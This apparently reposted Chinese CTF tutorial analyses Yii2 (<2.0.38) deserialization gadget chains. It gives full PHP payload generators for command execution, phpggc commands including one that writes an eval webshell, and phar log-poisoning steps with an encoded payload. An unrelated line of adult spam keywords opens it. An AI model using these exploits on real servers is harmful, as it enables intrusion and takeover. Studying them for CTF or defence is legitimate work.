国产成人综合久久亚洲精品,欧美日韩亚洲精品瑜伽裤,国产亚洲欧美日韩在线一区二区三区

Yii2＜2.0.38反序列化

鏈一

鏈二

鏈三

鏈四

phpggc

CTF題目

[HMBCTF 2021]framework

[CISCN2021 Quals]filter

首頁

php框架

YII

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

青燈夜游

Feb 23, 2022 am 10:33 AM

yii2

本篇文章帶大家了解yii2框架，分享幾道CTF習(xí)題，通過它們來學(xué)習(xí)yii2框架，希望對大家有所幫助。

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

Yii是一套基于組件、用于開發(fā)大型 Web 應(yīng)用的高性能 PHP 框架，Yii2 2.0.38 之前的版本存在反序列化漏洞，程序在調(diào)用unserialize()時，攻擊者可通過構(gòu)造特定的惡意請求執(zhí)行任意命令，本篇就分析一下yii2利用鏈以及如何自己去構(gòu)造payload，并結(jié)合CTF題目去學(xué)習(xí)yii2框架

Yii2＜2.0.38反序列化

安裝：在 https://github.com/yiisoft/yii2/releases下載2.0.37的版本

然后在 yii-basic-app-2.0.37\basic\config\web.php里面往cookieValidationKey隨意給點值，運行 php yii serve，新建一個控制器

yii-basic-app-2.0.37\basic\controllers\TestController.php

<?php
namespace app\controllers;
use yii\web\Controller;

class TestController extends Controller{
    public function actionTest($name){
        return unserialize($name);
    }
}

就可以進(jìn)行測試了

?r=test/test&name=

鏈一

鏈的入口在

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\db\BatchQueryResult.php

public function __destruct()
    {
        // make sure cursor is closed
        $this->reset();
    }

跟進(jìn)$this->reset();

public function reset()
    {
        if ($this->_dataReader !== null) {
            $this->_dataReader->close();
        }

這里的$this->_dataReader可控，并調(diào)用了close()方法，那么可以找到一個類不存在close()方法，但存在__call方法就可以調(diào)用他了

在yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2-gii\src\Generator.php

public function __call($method, $attributes)
    {
        return $this->format($method, $attributes);
    }

這里的$method為close，$attributes為空，繼續(xù)跟進(jìn)format

public function format($formatter, $arguments = array())
    {
        return call_user_func_array($this->getFormatter($formatter), $arguments);
    }

跟進(jìn)getFormatter

public function getFormatter($formatter)
    {
        if (isset($this->formatters[$formatter])) {
            return $this->formatters[$formatter];
        }

似曾相識的代碼，laravel5.8某條鏈就出現(xiàn)過，這里$this->formatters可控，也就是$this->getFormatter($formatter)這這個可控，但是$arguments的值我們無法控制，值為空

到這里可以執(zhí)行phpinfo了

<?php
namespace yii\db{
    class BatchQueryResult{
        private $_dataReader;
        public function __construct($_dataReader) {
            $this->_dataReader = $_dataReader;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace {
    $a = new Faker\Generator(array(&#39;close&#39;=>&#39;phpinfo&#39;));
    $b = new yii\db\BatchQueryResult($a);
    print(urlencode(serialize($b)));
}

但是我們想要rce的話，還要在yii2中已有的無參方法中進(jìn)行挖掘

這里我們可以使用正則匹配直接搜索含有call_user_function的無參函數(shù)

call_user_func\(\$this->([a-zA-Z0-9]+), \$this->([a-zA-Z0-9]+)

然后找到下面兩個都比較好用

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\IndexAction.php
public function run()
    {
        if ($this->checkAccess) {
            call_user_func($this->checkAccess, $this->id);
        }

        return $this->prepareDataProvider();
    }

yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\rest\CreateAction.php
public function run()
{
    if ($this->checkAccess) {
        call_user_func($this->checkAccess, $this->id);
}

這里的$this->checkAccess和$this->id都是我們可控的

所以直接構(gòu)造就行了

<?php
namespace yii\db{
    class BatchQueryResult{
        private $_dataReader;
        public function __construct($_dataReader) {
            $this->_dataReader = $_dataReader;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new Faker\Generator(array(&#39;close&#39;=>array($c, &#39;run&#39;)));
    $a = new yii\db\BatchQueryResult($b);
    print(urlencode(serialize($a)));
}

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

鏈二

這個是yii2 2.0.37的另外一條鏈

起點和鏈一相同，是BatchQueryResult類的__destruct，然后是$this->_dataReader->close()，但是這里不找__call，我們?nèi)フ掖嬖?code>close方法的類

找到yii-basic-app-2.0.37\basic\vendor\yiisoft\yii2\web\DbSession.php

class DbSession extends MultiFieldSession
{
...
public function close()
    {
        if ($this->getIsActive()) {
            // prepare writeCallback fields before session closes
            $this->fields = $this->composeFields();

這里跟進(jìn)$this->composeFields()

abstract class MultiFieldSession extends Session
{
protected function composeFields($id = null, $data = null)
    {
        $fields = $this->writeCallback ? call_user_func($this->writeCallback, $this) : [];

這里$this->writeCallback可控，$this是一個對象，所以這里調(diào)phpinfo的話應(yīng)該不行，不過可以續(xù)上鏈一的run方法（即那個無參的方法）

這里直接構(gòu)造即可

<?php
namespace yii\db{
    class BatchQueryResult{
        private $_dataReader;
        public function __construct($_dataReader) {
            $this->_dataReader = $_dataReader;
        }
    }
}
namespace yii\web{
    class DbSession{
        public $writeCallback;
        public function __construct($writeCallback) {
            $this->writeCallback = $writeCallback;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new yii\web\DbSession(array($c, &#39;run&#39;));
    $a = new yii\db\BatchQueryResult($b);
    print(urlencode(serialize($a)));
}

鏈三

我們可以在yii2 2.0.38的commit看到他加了一個__wakeup

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

這里限制了鏈一的起點BatchQueryResult無法使用，后面的__call的鏈沒有被破壞，所以我們繼續(xù)尋找一個__destruct

yii-basic-app-2.0.37\basic\vendor\codeception\codeception\ext\RunProcess.php

public function __destruct()
    {
        $this->stopProcess();
    }

這里繼續(xù)跟進(jìn)stopProcess

public function stopProcess()
    {
        foreach (array_reverse($this->processes) as $process) {
            /** @var $process Process  **/
            if (!$process->isRunning()) {
                continue;
            }

這里的$this->processes可控，所以可以利用$process->isRunning()來進(jìn)行觸發(fā)__call

后面的利用就和鏈一相同了

<?php
namespace Codeception\Extension{
    class RunProcess{
        private $processes = [];
        public function __construct($processes) {
            $this->processes[] = $processes;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new Faker\Generator(array(&#39;isRunning&#39;=>array($c, &#39;run&#39;)));
    $a = new Codeception\Extension\RunProcess($b);
    print(urlencode(serialize($a)));
}

鏈四

同樣的先找__destruct

yii-basic-app-2.0.37\basic\vendor\swiftmailer\swiftmailer\lib\classes\Swift\KeyCache\DiskKeyCache.php

public function __destruct()
    {
        foreach ($this->keys as $nsKey => $null) {
            $this->clearAll($nsKey);
        }
    }

這里$nsKey可控，跟進(jìn)clearAll

public function clearAll($nsKey)
    {
        if (array_key_exists($nsKey, $this->keys)) {
            foreach ($this->keys[$nsKey] as $itemKey => $null) {
                $this->clearKey($nsKey, $itemKey);
            }
            if (is_dir($this->path.&#39;/&#39;.$nsKey)) {
                rmdir($this->path.&#39;/&#39;.$nsKey);
            }
            unset($this->keys[$nsKey]);
        }
    }

這里沒有觸發(fā)__call的地方，但是存在字符串的拼接，可以觸發(fā)__toString

隨便找找就找到了yii-basic-app-2.0.37\basic\vendor\codeception\codeception\src\Codeception\Util\XmlBuilder.php

public function __toString()
{
    return $this->__dom__->saveXML();
}

同樣用他去觸發(fā)__call

<?php
namespace {
    class Swift_KeyCache_DiskKeyCache{
        private $path;
        private $keys = [];
        public function __construct($path,$keys) {
            $this->path = $path;
            $this->keys = $keys;
        }
    }
}
namespace Codeception\Util{
    class XmlBuilder{
        protected $__dom__;
        public function __construct($__dom__) {
            $this->__dom__ = $__dom__;
        }
    }
}
namespace Faker{
    class Generator{
        protected $formatters = array();
        public function __construct($formatters) {
            $this->formatters = $formatters;
        }
    }
}
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct($checkAccess,$id){
            $this->checkAccess = $checkAccess;
            $this->id = $id;
        }
    }
}
namespace {
    $c = new yii\rest\CreateAction(&#39;system&#39;,&#39;whoami&#39;);
    $b = new Faker\Generator(array(&#39;saveXML&#39;=>array($c,&#39;run&#39;)));
    $a = new Codeception\Util\XmlBuilder($b);
    $d = new Swift_KeyCache_DiskKeyCache($a,array(&#39;kawhi&#39;=>&#39;kawhi&#39;));
    print(urlencode(serialize($d)));
}

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

phpggc

使用./phpggc -l yii2可以看到有兩條yii2的鏈

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

可以使用如下命令快速得到鏈，-u指url編碼

./phpggc Yii2/RCE1 system id -u

phpggc的鏈二的終點是一個eval，所以這里可以直接寫shell，-b指base64編碼

./phpggc Yii2/RCE2 &#39;file_put_contents("shell.php",base64_decode("PD9waHAgZXZhbCgkX1BPU1RbMV0pPz4="));&#39; -b

CTF題目

[HMBCTF 2021]framework

把題目附件解壓，看到html\controllers\SiteController.php

class SiteController extends Controller
{
    public function actionAbout($message = &#39;Hello&#39;)
    {
        $data = base64_decode($message);
        unserialize($data);
    }

這里可以這樣傳參

?r=site/about&message=

拿鏈一打了一下，發(fā)現(xiàn)一下system等函數(shù)被ban

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

這里用phpggc yii2的鏈二寫一個shell進(jìn)去，然后用蟻劍的 apache/mod 繞 disable，運行 /readflag 即可獲取 flag

[CISCN2021 Quals]filter

據(jù)說這是配置文件里面的重要內(nèi)容，或許對你有用??！

        &#39;log&#39; => [
            &#39;traceLevel&#39; => YII_DEBUG ? 0 : 0,
            &#39;targets&#39; => [
                [
                    &#39;class&#39; => &#39;yii\log\FileTarget&#39;,
                    &#39;levels&#39; => [&#39;error&#39;],
                    &#39;logVars&#39; => [],
                ],
            ],
        ],

看到附件的SiteController.php就改了這個地方

public function actionIndex()
    {
        $file = Yii::$app->request->get(&#39;file&#39;);
        $res = file_get_contents($file);
        file_put_contents($file,$res);
        return $this->render(&#39;index&#39;);
    }

yii框架的runtime/logs目錄下有一個app.log

看一下依賴發(fā)現(xiàn)monolog符合

"require": {
        "php": ">=5.6.0",
        "yiisoft/yii2": "~2.0.14",
        "yiisoft/yii2-bootstrap": "~2.0.0",
        "yiisoft/yii2-swiftmailer": "~2.0.0 || ~2.1.0",
    "monolog/monolog":"1.19"
    },

首先清空日志文件

?file=php://filter/write=convert.iconv.utf-8.utf-16be|convert.quoted-printable-encode|convert.iconv.utf-16be.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

phpggc生成

php -d&#39;phar.readonly=0&#39; ./phpggc Monolog/RCE1 "phpinfo" "1" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(&#39;&#39;.join([&#39;=&#39; + hex(ord(i))[2:].zfill(2) + &#39;=00&#39; for i in sys.stdin.read()]).upper())"

寫入日志，注意最后面要加個字符a

/?file==50=00=44=00=39=00=77=00=61=00=48=00=41=00=67=00=58=00=31=00=39=00=49=00=51=00=55=00=78=00=55=00=58=00=30=00=4E=00=50=00=54=00=56=00=42=00=4A=00=54=00=45=00=56=00=53=00=4B=00=43=00=6B=00=37=00=49=00=44=00=38=00=2B=00=44=00=51=00=71=00=39=00=41=00=67=00=41=00=41=00=41=00=67=00=41=00=41=00=41=00=42=00=45=00=41=00=41=00=41=00=41=00=42=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=6D=00=41=00=67=00=41=00=41=00=54=00=7A=00=6F=00=7A=00=4D=00=6A=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=46=00=4E=00=35=00=63=00=32=00=78=00=76=00=5A=00=31=00=56=00=6B=00=63=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=45=00=36=00=65=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=32=00=39=00=6A=00=61=00=32=00=56=00=30=00=49=00=6A=00=74=00=50=00=4F=00=6A=00=49=00=35=00=4F=00=69=00=4A=00=4E=00=62=00=32=00=35=00=76=00=62=00=47=00=39=00=6E=00=58=00=45=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=4A=00=63=00=51=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=53=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=36=00=4E=00=7A=00=70=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=61=00=47=00=46=00=75=00=5A=00=47=00=78=00=6C=00=63=00=69=00=49=00=37=00=54=00=7A=00=6F=00=79=00=4F=00=54=00=6F=00=69=00=54=00=57=00=39=00=75=00=62=00=32=00=78=00=76=00=5A=00=31=00=78=00=49=00=59=00=57=00=35=00=6B=00=62=00=47=00=56=00=79=00=58=00=45=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=6A=00=63=00=36=00=65=00=33=00=4D=00=36=00=4D=00=54=00=41=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=68=00=68=00=62=00=6D=00=52=00=73=00=5A=00=58=00=49=00=69=00=4F=00=30=00=34=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=55=00=32=00=6C=00=36=00=5A=00=53=00=49=00=37=00=61=00=54=00=6F=00=74=00=4D=00=54=00=74=00=7A=00=4F=00=6A=00=6B=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=69=00=49=00=37=00=59=00=54=00=6F=00=78=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=78=00=4F=00=69=00=49=00=78=00=49=00=6A=00=74=00=7A=00=4F=00=6A=00=55=00=36=00=49=00=6D=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=31=00=39=00=63=00=7A=00=6F=00=34=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=73=00=5A=00=58=00=5A=00=6C=00=62=00=43=00=49=00=37=00=54=00=6A=00=74=00=7A=00=4F=00=6A=00=45=00=30=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=70=00=62=00=6D=00=6C=00=30=00=61=00=57=00=46=00=73=00=61=00=58=00=70=00=6C=00=5A=00=43=00=49=00=37=00=59=00=6A=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=4A=00=31=00=5A=00=6D=00=5A=00=6C=00=63=00=6B=00=78=00=70=00=62=00=57=00=6C=00=30=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=4D=00=36=00=49=00=67=00=41=00=71=00=41=00=48=00=42=00=79=00=62=00=32=00=4E=00=6C=00=63=00=33=00=4E=00=76=00=63=00=6E=00=4D=00=69=00=4F=00=32=00=45=00=36=00=4D=00=6A=00=70=00=37=00=61=00=54=00=6F=00=77=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=59=00=33=00=56=00=79=00=63=00=6D=00=56=00=75=00=64=00=43=00=49=00=37=00=61=00=54=00=6F=00=78=00=4F=00=33=00=4D=00=36=00=4E=00=7A=00=6F=00=69=00=63=00=47=00=68=00=77=00=61=00=57=00=35=00=6D=00=62=00=79=00=49=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=45=00=7A=00=4F=00=69=00=49=00=41=00=4B=00=67=00=42=00=69=00=64=00=57=00=5A=00=6D=00=5A=00=58=00=4A=00=54=00=61=00=58=00=70=00=6C=00=49=00=6A=00=74=00=70=00=4F=00=69=00=30=00=78=00=4F=00=33=00=4D=00=36=00=4F=00=54=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=49=00=6A=00=74=00=68=00=4F=00=6A=00=45=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=68=00=4F=00=6A=00=49=00=36=00=65=00=32=00=6B=00=36=00=4D=00=44=00=74=00=7A=00=4F=00=6A=00=45=00=36=00=49=00=6A=00=45=00=69=00=4F=00=33=00=4D=00=36=00=4E=00=54=00=6F=00=69=00=62=00=47=00=56=00=32=00=5A=00=57=00=77=00=69=00=4F=00=30=00=34=00=37=00=66=00=58=00=31=00=7A=00=4F=00=6A=00=67=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=78=00=6C=00=64=00=6D=00=56=00=73=00=49=00=6A=00=74=00=4F=00=4F=00=33=00=4D=00=36=00=4D=00=54=00=51=00=36=00=49=00=67=00=41=00=71=00=41=00=47=00=6C=00=75=00=61=00=58=00=52=00=70=00=59=00=57=00=78=00=70=00=65=00=6D=00=56=00=6B=00=49=00=6A=00=74=00=69=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4E=00=44=00=6F=00=69=00=41=00=43=00=6F=00=41=00=59=00=6E=00=56=00=6D=00=5A=00=6D=00=56=00=79=00=54=00=47=00=6C=00=74=00=61=00=58=00=51=00=69=00=4F=00=32=00=6B=00=36=00=4C=00=54=00=45=00=37=00=63=00=7A=00=6F=00=78=00=4D=00=7A=00=6F=00=69=00=41=00=43=00=6F=00=41=00=63=00=48=00=4A=00=76=00=59=00=32=00=56=00=7A=00=63=00=32=00=39=00=79=00=63=00=79=00=49=00=37=00=59=00=54=00=6F=00=79=00=4F=00=6E=00=74=00=70=00=4F=00=6A=00=41=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=6A=00=64=00=58=00=4A=00=79=00=5A=00=57=00=35=00=30=00=49=00=6A=00=74=00=70=00=4F=00=6A=00=45=00=37=00=63=00=7A=00=6F=00=33=00=4F=00=69=00=4A=00=77=00=61=00=48=00=42=00=70=00=62=00=6D=00=5A=00=76=00=49=00=6A=00=74=00=39=00=66=00=58=00=30=00=46=00=41=00=41=00=41=00=41=00=5A=00=48=00=56=00=74=00=62=00=58=00=6B=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=49=00=41=00=41=00=41=00=41=00=64=00=47=00=56=00=7A=00=64=00=43=00=35=00=30=00=65=00=48=00=51=00=45=00=41=00=41=00=41=00=41=00=47=00=59=00=61=00=33=00=59=00=41=00=51=00=41=00=41=00=41=00=41=00=4D=00=66=00=6E=00=2F=00=59=00=70=00=41=00=45=00=41=00=41=00=41=00=41=00=41=00=41=00=41=00=42=00=30=00=5A=00=58=00=4E=00=30=00=64=00=47=00=56=00=7A=00=64=00=4A=00=41=00=61=00=47=00=73=00=75=00=53=00=31=00=47=00=68=00=54=00=49=00=2B=00=6B=00=4B=00=58=00=33=00=45=00=68=00=2B=00=4D=00=44=00=71=00=54=00=76=00=6E=00=6F=00=41=00=67=00=41=00=41=00=41=00=45=00=64=00=43=00=54=00=55=00=49=00=3D=00a

保留phar的內(nèi)容

/?file=php://filter/write=convert.quoted-printable-decode|convert.iconv.utf-16le.utf-8|convert.base64-decode/resource=../runtime/logs/app.log

最后用phar協(xié)議打一下

/?file=phar://../runtime/logs/app.log/test.txt

精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！

然后在根目錄找到This_is_flaaagggg

然后用這個找一下flag即可

php -d&#39;phar.readonly=0&#39; ./phpggc Monolog/RCE1 "system" "cat /This_is_flaaagggg" --phar phar -o php://output | base64 -w0 | python -c "import sys;print(&#39;&#39;.join([&#39;=&#39; + hex(ord(i))[2:].zfill(2) + &#39;=00&#39; for i in sys.stdin.read()]).upper())"

本文涉及相關(guān)實驗：PHP反序列化漏洞實驗（通過本次實驗，大家將會明白什么是反序列化漏洞，反序列化漏洞的成因以及如何挖掘和預(yù)防此類漏洞。

相關(guān)文章教程推薦：《yii框架教程》

以上是精選幾道CTF練習(xí)，帶你學(xué)習(xí)yii2框架！的詳細(xì)內(nèi)容。更多資訊請關(guān)注PHP中文網(wǎng)其他相關(guān)文章！

本網(wǎng)站聲明

本文內(nèi)容由網(wǎng)友自願投稿，版權(quán)歸原作者所有。本站不承擔(dān)相應(yīng)的法律責(zé)任。如發(fā)現(xiàn)涉嫌抄襲或侵權(quán)的內(nèi)容，請聯(lián)絡(luò)admin@php.cn